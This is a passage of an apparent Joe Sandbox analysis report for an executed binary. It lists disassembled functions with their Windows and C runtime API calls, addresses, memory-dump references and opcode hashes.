                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 247a612ea4be01b02d248802476af834ac7bbfd7b19dac02522c3ad7b25eaf12
                                                                                                                                                                                            • Instruction ID: 64df9d874cb93d6b14c0739205b771bb29e536089473430c8a5f4bf5773e3f01
                                                                                                                                                                                            • Opcode Fuzzy Hash: 247a612ea4be01b02d248802476af834ac7bbfd7b19dac02522c3ad7b25eaf12
                                                                                                                                                                                            • Instruction Fuzzy Hash: D921C63121A225AFDB20AF71FC80EABB76DAF903647104525F81597599DF31EC1087A1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00934857
                                                                                                                                                                                              • Part of subcall function 0092E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0092FDE8,?,00000000,-00000008), ref: 0092E6A2
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0093488F
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009348AF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                            • Opcode ID: 5374ed0f2164a33b2fe816323b507dfddc9c0dc96e421673180f703618cfddb2
                                                                                                                                                                                            • Instruction ID: 8d521ee3dbc505df2efe7383685837501961828c44cdadfe960e09f2d359d386
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5374ed0f2164a33b2fe816323b507dfddc9c0dc96e421673180f703618cfddb2
                                                                                                                                                                                            • Instruction Fuzzy Hash: B41104B5516265BF6A1127B5ACCDD6F395CDF86394B110434F401A1100FA64EE419A70
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00924582
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0092458C
                                                                                                                                                                                              • Part of subcall function 009224C2: std::_Lockit::_Lockit.LIBCPMT ref: 009224DE
                                                                                                                                                                                              • Part of subcall function 009224C2: std::_Lockit::~_Lockit.LIBCPMT ref: 009224F7
                                                                                                                                                                                            • codecvt.LIBCPMT ref: 009245C6
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009245FD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3716348337-0
                                                                                                                                                                                            • Opcode ID: 11b6befb29e4b9b976e3368b7310fb9e4e88706c8aa73c8bcd5c9ba9fedaf3bf
                                                                                                                                                                                            • Instruction ID: 4021d49be53903054a4e7e7888d6d06e61e03943949b9a98c9a3760e508130ee
                                                                                                                                                                                            • Opcode Fuzzy Hash: 11b6befb29e4b9b976e3368b7310fb9e4e88706c8aa73c8bcd5c9ba9fedaf3bf
                                                                                                                                                                                            • Instruction Fuzzy Hash: D001C0759002359BCB04EBA4F816BAD77B5BF91310F254508F412A72D9CF749E019B92
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000), ref: 0093A4F7
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000,?,?,?,00935365,00000000), ref: 0093A503
                                                                                                                                                                                              • Part of subcall function 0093A554: CloseHandle.KERNEL32(FFFFFFFE,0093A513,?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000,?,?), ref: 0093A564
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 0093A513
                                                                                                                                                                                              • Part of subcall function 0093A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0093A4D1,00939AFC,?,?,00935A1F,?,00000000,00000000,?), ref: 0093A548
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000,?), ref: 0093A528
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: d5bca61ce078fd0675d17ad0f318cad6b31553f2f3fa2151c417fe9d72a68c02
                                                                                                                                                                                            • Instruction ID: 7ca2d307ae3d8a52b7a729d7f1ec138bba8a4c0db13d7b761634de32997fe618
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5bca61ce078fd0675d17ad0f318cad6b31553f2f3fa2151c417fe9d72a68c02
                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F0123A024115BFCF221FE5EC04E9E3F26FB86361F004110F99985120D6318920AB92
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 009259B9
                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009259C8
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 009259D1
                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 009259DE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 879ab4795e75f6c56d94cd81242a0c9ff23e56846a0b3b149d07235e943f38aa
                                                                                                                                                                                            • Instruction ID: 4886730dbf673f2ebc7ae6283655788d1d1e8947e367c31804faf95075205c81
                                                                                                                                                                                            • Opcode Fuzzy Hash: 879ab4795e75f6c56d94cd81242a0c9ff23e56846a0b3b149d07235e943f38aa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 44F0B234D2520CEBCB00DBB4CA4998EFBF4FF1D200B918596A412E7210E730AB449F50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00929266,?,?,?,00000055,?,-00000050,?,?,?), ref: 009321D6
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00929266,?,?,?,00000055,?,-00000050,?,?), ref: 0093220D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                            • API String ID: 943130320-905460609
                                                                                                                                                                                            • Opcode ID: 146e9b8c66dbef1040a1c051a37b0be87b53b10bb7cc4030f122010eb5235f3e
                                                                                                                                                                                            • Instruction ID: 5068f5150969df6dda1864f0b73a640d0904d6b834bd4372d991664e96eec696
                                                                                                                                                                                            • Opcode Fuzzy Hash: 146e9b8c66dbef1040a1c051a37b0be87b53b10bb7cc4030f122010eb5235f3e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A510675644305AADB25BB74DC82FBB73ACEF85B00F144429FA16DB181FB74E9408EA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0092DEAD,?,?,00000000,00000000,00000000,?), ref: 0092DFD1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: 88d827fac53d6be14d18ef12ec9110b7f00d0c1a202ac450df47b833b8a0184e
                                                                                                                                                                                            • Instruction ID: 556c73608bb74a53f696bdc883448947454dcc53493f0c5e21b29cb210352e2d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 88d827fac53d6be14d18ef12ec9110b7f00d0c1a202ac450df47b833b8a0184e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 60417B31904219EFCF25DF94EC81AEEBBB9FF48304F188059F9046B219D3759951DB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0092DA8F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3493665558-3733052814
                                                                                                                                                                                            • Opcode ID: 1e9c1c30f166cbe713c8f09f01912c6fcfd41f5a3a3123914b841fcb4254750d
                                                                                                                                                                                            • Instruction ID: be53b2a235d093680086f9cab7538a443982a2aa9a54d9c27ad14ef133cf61f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e9c1c30f166cbe713c8f09f01912c6fcfd41f5a3a3123914b841fcb4254750d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02314832506238DFCF229F50EC50DAA7B69FF08364B198259FC448A225C332CDA1DBD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(0094648C,ios_base::badbit set,?,?,00921C84,00946478,00921B17), ref: 009229DF
                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(0094648C,?,?,00921C84,00946478,00921B17), ref: 00922A19
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                            • String ID: ios_base::badbit set
                                                                                                                                                                                            • API String ID: 17069307-3882152299
                                                                                                                                                                                            • Opcode ID: 5bd27c78422e05e029a00ce19567c83fa80f1da6e5a488d10c81d55ea33c2b9f
                                                                                                                                                                                            • Instruction ID: 04b3eb29b1ca0df6189d60eb0e9b1ad7493da9a3e7ad62eaa8433662ce43ebf0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd27c78422e05e029a00ce19567c83fa80f1da6e5a488d10c81d55ea33c2b9f
                                                                                                                                                                                            • Instruction Fuzzy Hash: E0F0A778514610EFC7209F18E904E257BB8FB87734F10432EE89A436E0C7351882DB51
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CommandLine
                                                                                                                                                                                            • String ID: x5w
                                                                                                                                                                                            • API String ID: 3253501508-3388196563
                                                                                                                                                                                            • Opcode ID: 0c8fe7925d0334f6b062605146c8549b75950ebbc64b14c9d07b0460338c121a
                                                                                                                                                                                            • Instruction ID: 390803d113391bd000c798800a851186082a52811feb046e4790f071befd0911
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c8fe7925d0334f6b062605146c8549b75950ebbc64b14c9d07b0460338c121a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BB092FC86D600CFC700CFB0F80CA053BA0B20B202380C156D862D2B60D7758140FF02
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00932B49,00000002,00000000,?,?,?,00932B49,?,00000000), ref: 00933211
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,00932B49,00000002,00000000,?,?,?,00932B49,?,00000000), ref: 0093323A
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00932B49,?,00000000), ref: 0093324F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                            • Opcode ID: 580559755e1203b597d140b903503896893de723ae48e6b702c3150b2025e1df
                                                                                                                                                                                            • Instruction ID: 6d44dbec55c496c58d46e8e02100e0d9673d364b9ec02b06791d8015f1b6bb73
                                                                                                                                                                                            • Opcode Fuzzy Hash: 580559755e1203b597d140b903503896893de723ae48e6b702c3150b2025e1df
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E21B036684100AAEB348FA5DC45BA7B3AAEF94F50F66C524E91AD7110E732DF40DB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00932B1B
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00932B59
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00932B6C
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00932BB4
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00932BCF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                            • Opcode ID: 23da9d00e6029552aa6d899d85afe97637d9ab4c2c8659b0ab454b2de5930cb1
                                                                                                                                                                                            • Instruction ID: 417bf149b12e1ef3b017298094b9cc6683fdb5371b6e04867075ea8df5d2a786
                                                                                                                                                                                            • Opcode Fuzzy Hash: 23da9d00e6029552aa6d899d85afe97637d9ab4c2c8659b0ab454b2de5930cb1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F516D71A0021AABDB20DFA4DC45FAEB7BCFF59700F184469E550EB190EBB09A44DF61
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00921098: _strlen.LIBCMT ref: 009210F9
                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00921685
                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009216AB
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009216BA
                                                                                                                                                                                            • _strlen.LIBCMT ref: 00921705
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00921805
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1490117831-0
